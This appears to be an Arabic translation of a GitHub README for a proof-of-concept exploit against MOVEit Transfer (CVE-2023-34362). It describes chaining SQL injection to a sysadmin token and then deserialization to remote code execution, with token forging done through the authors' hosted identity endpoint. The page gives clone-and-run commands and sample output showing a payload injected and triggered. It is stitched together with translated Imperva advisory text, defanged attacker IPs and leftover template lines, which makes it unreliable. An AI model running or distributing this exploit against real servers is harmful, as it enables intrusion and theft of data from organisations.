
استغلال POC لـ CVE-2023-34362 الذي يؤثر على MOVEit Transfer
استغلال إثبات المفهوم لـ CVE-2023-34362 الذي يؤثر على MOVEit Transfer
ملاحظة: هذا المشروع منتهٍ...
صفحتنا على إنستغرام
.
قناتنا على يوتيوب
.
صفحتنا على تويتر
إثبات المفهوم لـ CVE-2023-34362 الذي يؤثر على MOVEit Transfer
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي فقط ولتطوير تقنيات دفاعية فعالة، وليس المقصود منه استخدامه لمهاجمة الأنظمة إلا بإذن صريح. المسؤولون عن المشروع ليسوا مسؤولين عن سوء استخدام البرنامج. استخدمه بمسؤولية.
يسيء إثبات المفهوم هذا استخدام حقن SQL للحصول على رمز وصول لواجهة برمجة تطبيقات مدير النظام ثم يستخدم هذا الوصول لإساءة استخدام استدعاء إلغاء التسلسل للحصول على تنفيذ تعليمات برمجية عن بُعد.
يحتاج إثبات المفهوم هذا إلى الاتصال بنقطة نهاية موفر الهوية التي تستضيف شهادات RS256 صالحة تُستخدم لتزوير رموز المستخدمين العشوائية - افتراضيًا، يستخدم إثبات المفهوم هذا نقطة نهاية موفر الهوية الخاصة بنا المستضافة في AWS.
افتراضيًا، سيكتب الاستغلال ملفًا إلى C:\Windows\Temp\message.txt. يمكن إنشاء حمولات بديلة باستخدام مشروع ysoserial.net.
MOVEit Transfer هو حل نقل ملفات آمن شهير طورته Progress، وهي شركة تابعة لـ Ipswitch. في الوقت الحالي، هناك أكثر من 2500 خادم MOVEit Transfer يمكن الوصول إليها عبر الإنترنت، وفقًا لـ Shodan.

في 31 مايو 2023، أصدرت Progress تنبيهًا أمنيًا يؤثر على الإصدارات 2021.0.6 (13.0.6)، 2021.1.4 (13.1.4)، 2022.0.4 (14.0.4)، 2022.1.5 (14.1.5)، 2023.0.1 (15.0.1).
يُصنف الثغرة الأمنية على أنها حقن SQL يسمح لمستخدم غير مصادق بالوصول إلى قواعد بيانات MOVEit، مما قد يؤدي إلى تنفيذ تعليمات برمجية عشوائية وسرقة البيانات.
تبدأ سلسلة الهجوم بحقن SQL يسترد بيانات اعتماد المسؤول، مما يسمح بتحميل ملفات غير مقيدة يمكن للمهاجمين استخدامها لتثبيت باب خلفي على الخادم.
يوم الجمعة، 1 يونيو 2023، تمت إضافة CVE إلى قائمة الثغرات الأمنية المعروفة المستغلة من قبل CISA (KEV)، مما يشير إلى أن هذه ثغرة حرجة ويتم استغلالها حاليًا في البيئة الحقيقية.
لم يتم إصدار إثبات مفهوم (PoC). ومع ذلك، بعد مزيد من التحقيق، أنشأ فريق أبحاث التهديدات في Imperva قواعد تخفيف فعالة ومخصصة لهذه الثغرة لتعزيز التخفيف المدمج الحالي ضد هجمات حقن SQL التي اكتشفت الهجوم بالفعل. يتم تخفيف CVE-2023-34362 بواسطة كل من Imperva Cloud WAF و WAF Gateway و RASP.
على مدار الأيام القليلة الماضية، لاحظ فريق أبحاث التهديدات في Imperva آلاف محاولات الاستغلال، تم إحباطها جميعًا بنجاح بواسطة Imperva Cloud WAF و Imperva WAF Gateway (WAF المُدار من قبل العميل). تم تنفيذ معظم محاولات الاستغلال بواسطة أدوات اختراق آلية مكتوبة بلغات برمجة مختلفة، مثل Python عبر وحدة requests و Bash عبر أداة CURL. الصناعات الرئيسية التي استهدفتها هذه الثغرة هي الخدمات المالية والرعاية الصحية.
لاحظ فريق أبحاث التهديدات في Imperva محاولات استغلال قادمة من عناوين IP هذه:
51[.]158[.]122[.]21
51[.]15[.]218[.]116
196[.]112[.]216[.]184
67[.]220[.]86[.]236
51[.]15[.]199[.]148
158[.]247[.]208[.]44
50[.]19[.]142[.]233
من المهم أيضًا ملاحظة أن عناوين IP هذه حصلت على درجة مخاطر عالية بناءً على آلية سمعة IP الخاصة بـ Imperva. يشير هذا إلى أن عناوين IP كانت تشارك بنشاط في أنشطة ضارة في الأيام الأخيرة.
كما هو الحال دائمًا، يراقب فريق أبحاث التهديدات في Imperva الوضع عن كثب وسيقدم تحديثات مع ظهور معلومات جديدة.

استغلال إثبات المفهوم لـ CVE-2023-34362 الذي يؤثر على MOVEit Transfer
بينما كنت المطور الرئيسي لهذا المشروع، لم يكن بإمكان هذا المشروع أن يبدأ بدون مساعدة هذه المشاريع مفتوحة المصدر، شكر خاص لـ:
هذا مثال لكيفية إعطاء تعليمات حول إعداد مشروعك محليًا. للحصول على نسخة محلية وتشغيلها، اتبع هذه الخطوات البسيطة.
هذا البرنامج ليس له متطلبات أساسية
git clone https://github.com/errorfiathck/MOVEit-Exploit.git
cd MOVEit-Exploit
python3 CVE-2023-34362.py https://127.0.0.1
[*] Getting sysadmin access token
[*] Got access token
[*] Getting FolderID
[*] Got FolderID: 963611079
[*] Starting file upload
[*] Got FileID: 965943963
[*] Injecting the payload
[*] Payload injected
[*] Triggering payload via resume call
[+] Triggered the payload!
[*] Deleting uploaded file